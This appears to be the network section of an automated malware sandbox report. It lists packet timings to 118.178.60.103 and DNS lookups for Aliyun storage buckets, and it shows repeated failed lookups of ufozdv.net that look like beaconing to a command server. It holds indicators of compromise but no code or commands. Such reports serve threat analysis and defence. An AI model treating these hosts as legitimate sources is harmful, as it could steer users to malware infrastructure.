                                                                                Jan 10, 2025 02:29:40.286375046 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.286438942 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.288520098 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.288583994 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.292078018 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.292144060 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.294431925 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.294502974 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.298989058 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.299050093 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.301282883 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.301378012 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.305833101 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.305918932 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.308191061 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.308283091 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.312962055 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.313082933 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.315258980 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.315337896 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.320178986 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.320250988 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.322408915 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.322470903 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.326663971 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.326745033 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.328965902 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.329030991 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.333655119 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.333724022 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.338290930 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.338355064 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.340610027 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.340679884 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.345136881 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.345207930 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.347812891 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.347876072 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.349724054 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.349786043 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.354737997 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.354808092 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.356573105 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.356648922 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.361447096 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.361538887 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.363708973 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.363769054 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.365942001 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.365999937 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.370461941 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.370520115 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.372838974 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.372894049 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.377546072 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.377607107 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.379890919 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.379976988 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.382035971 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.382093906 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.391673088 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.391742945 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.391763926 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.391813993 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.394007921 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.394078016 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.395816088 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.395874023 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.400626898 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.400702953 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.402883053 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.402941942 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.405323982 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.405405045 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.409848928 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.409930944 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.411976099 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.412039995 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.416681051 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.416748047 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.419078112 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.419140100 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.421237946 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.421312094 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.426007986 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.426064968 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.532049894 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.532143116 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.535079002 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.535147905 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.537360907 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.537446022 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.541554928 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.541632891 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.543591976 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.543667078 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.545809984 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.547039986 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.550054073 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.550137043 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.552294016 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.552514076 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.556670904 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.557943106 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.558660030 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.559004068 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.560822964 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.562192917 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.565099955 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.565242052 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.567277908 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.567337036 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.571718931 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.571813107 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.573689938 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.573751926 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.576153994 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.576257944 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.580204010 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.580279112 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.590907097 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.591012955 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.591038942 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.591056108 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.591077089 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.591104031 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.591260910 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.591269970 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.591341019 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.593044043 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.593111992 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.595287085 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.595365047 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.597234011 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.597312927 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.601514101 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.601787090 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.603874922 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.604089022 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.607889891 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.607985020 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.610157967 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.610238075 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.612333059 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.612540007 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.616609097 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.617168903 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.618799925 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.618927956 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.623347044 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.623429060 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.625132084 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.625324965 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.627239943 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.627299070 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.631659031 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.631808996 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.633924961 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.634131908 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.637845993 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.638560057 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.639981031 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.641771078 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.643851042 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.644663095 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.645739079 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.646512985 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.647994041 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.648061037 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.651496887 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.651565075 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.651602030 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.651748896 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.651757002 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.651777983 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:29:40.651913881 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.659626007 CET60502443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:29:40.659643888 CET44360502118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:30:14.534456968 CET60503443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:30:14.534506083 CET44360503118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:30:14.534581900 CET60503443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:30:14.536191940 CET60503443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:30:14.536205053 CET44360503118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:30:15.889530897 CET44360503118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:30:15.889775991 CET60503443192.168.2.5118.178.60.103
                                                                                Jan 10, 2025 02:30:15.892273903 CET44360503118.178.60.103192.168.2.5
                                                                                Jan 10, 2025 02:30:15.892342091 CET60503443192.168.2.5118.178.60.103

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jan 10, 2025 02:26:16.537333965 CET5975053192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:26:16.680809021 CET53597501.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:27:13.258482933 CET5828153192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:27:13.563659906 CET53582811.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:27:45.616497040 CET5099553192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:27:45.775434017 CET53509951.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:27:51.995721102 CET6154353192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:27:52.026374102 CET53615431.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:27:58.069045067 CET6146953192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:27:58.078191042 CET53614691.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:28:04.178584099 CET6263153192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:28:04.188152075 CET53626311.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:28:10.209705114 CET5218453192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:28:10.240559101 CET53521841.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:28:16.272305965 CET5918853192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:28:16.281693935 CET53591881.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:28:22.305000067 CET4944553192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:28:23.272474051 CET53494451.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:28:28.524647951 CET5643053192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:28:28.534584999 CET53564301.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:28:34.475414991 CET6384753192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:28:34.485044956 CET53638471.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:28:39.992443085 CET5100253192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:28:39.999120951 CET53510021.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:28:44.850604057 CET5883653192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:28:44.859705925 CET53588361.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:28:49.413060904 CET5923653192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:28:49.422720909 CET53592361.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:28:54.401160955 CET6072553192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:28:54.411616087 CET53607251.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:28:59.396996021 CET5756053192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:28:59.405925989 CET53575601.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:04.401714087 CET5144853192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:04.432322979 CET53514481.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:09.500509977 CET5685353192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:09.509416103 CET53568531.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:14.400810957 CET5112253192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:14.408262014 CET53511221.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:19.412151098 CET5025553192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:19.445544004 CET53502551.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:24.400141954 CET5403053192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:24.410254002 CET53540301.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:29.077048063 CET6200153192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:29.400393963 CET5416853192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:29.409614086 CET53541681.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:29.417352915 CET53620011.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:34.397859097 CET5144853192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:34.405073881 CET53514481.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:39.398077011 CET5529653192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:39.429744005 CET53552961.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:44.398792982 CET4980953192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:44.431638002 CET53498091.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:49.399424076 CET6234953192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:49.429574966 CET53623491.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:54.404778957 CET5647753192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:54.414125919 CET53564771.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:29:59.405046940 CET5163053192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:29:59.414804935 CET53516301.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:30:04.510382891 CET5371153192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:30:04.520766020 CET53537111.1.1.1192.168.2.5
                                                                                Jan 10, 2025 02:30:09.456651926 CET6261753192.168.2.51.1.1.1
                                                                                Jan 10, 2025 02:30:09.465814114 CET53626171.1.1.1192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Jan 10, 2025 02:26:16.537333965 CET192.168.2.51.1.1.10x6fe9Standard query (0)tjgohh.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:27:13.258482933 CET192.168.2.51.1.1.10xdbe9Standard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:27:45.616497040 CET192.168.2.51.1.1.10x7969Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:27:51.995721102 CET192.168.2.51.1.1.10xfc1eStandard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:27:58.069045067 CET192.168.2.51.1.1.10xd26Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:04.178584099 CET192.168.2.51.1.1.10xf381Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:10.209705114 CET192.168.2.51.1.1.10xd62aStandard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:16.272305965 CET192.168.2.51.1.1.10x4eb6Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:22.305000067 CET192.168.2.51.1.1.10xab4cStandard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:28.524647951 CET192.168.2.51.1.1.10xa4caStandard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:34.475414991 CET192.168.2.51.1.1.10xbe45Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:39.992443085 CET192.168.2.51.1.1.10x7a16Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:40.007862091 CET192.168.2.51.1.1.10x1Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:44.850604057 CET192.168.2.51.1.1.10x4ee4Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:49.413060904 CET192.168.2.51.1.1.10xb98aStandard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:54.401160955 CET192.168.2.51.1.1.10x1ec5Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:59.396996021 CET192.168.2.51.1.1.10xb790Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:04.401714087 CET192.168.2.51.1.1.10x1afcStandard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:09.500509977 CET192.168.2.51.1.1.10xb49aStandard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:14.400810957 CET192.168.2.51.1.1.10x74f4Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:19.412151098 CET192.168.2.51.1.1.10x3f50Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:24.400141954 CET192.168.2.51.1.1.10x2267Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:29.077048063 CET192.168.2.51.1.1.10x60a2Standard query (0)upitem.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:29.400393963 CET192.168.2.51.1.1.10x5646Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:34.397859097 CET192.168.2.51.1.1.10x7898Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:39.398077011 CET192.168.2.51.1.1.10x61eeStandard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:44.398792982 CET192.168.2.51.1.1.10x828eStandard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:49.399424076 CET192.168.2.51.1.1.10xd18dStandard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:54.404778957 CET192.168.2.51.1.1.10x8bd1Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:29:59.405046940 CET192.168.2.51.1.1.10xd645Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:30:04.510382891 CET192.168.2.51.1.1.10x25a2Standard query (0)ufozdv.netA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:30:09.456651926 CET192.168.2.51.1.1.10x26ccStandard query (0)ufozdv.netA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Jan 10, 2025 02:26:16.680809021 CET1.1.1.1192.168.2.50x6fe9No error (0)tjgohh.oss-cn-beijing.aliyuncs.comsc-2c8q.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                Jan 10, 2025 02:26:16.680809021 CET1.1.1.1192.168.2.50x6fe9No error (0)sc-2c8q.cn-beijing.oss-adns.aliyuncs.comsc-2c8q.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                Jan 10, 2025 02:26:16.680809021 CET1.1.1.1192.168.2.50x6fe9No error (0)sc-2c8q.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.42A (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:27:13.563659906 CET1.1.1.1192.168.2.50xdbe9No error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                Jan 10, 2025 02:27:13.563659906 CET1.1.1.1192.168.2.50xdbe9No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                Jan 10, 2025 02:27:13.563659906 CET1.1.1.1192.168.2.50xdbe9No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:27:45.775434017 CET1.1.1.1192.168.2.50x7969Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:27:52.026374102 CET1.1.1.1192.168.2.50xfc1eName error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:27:58.078191042 CET1.1.1.1192.168.2.50xd26Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:04.188152075 CET1.1.1.1192.168.2.50xf381Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:10.240559101 CET1.1.1.1192.168.2.50xd62aName error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
                                                                                Jan 10, 2025 02:28:16.281693935 CET1.1.1.1192.168.2.50x4eb6Name error (3)ufozdv.netnonenoneA (IP address)IN (0x0001)false
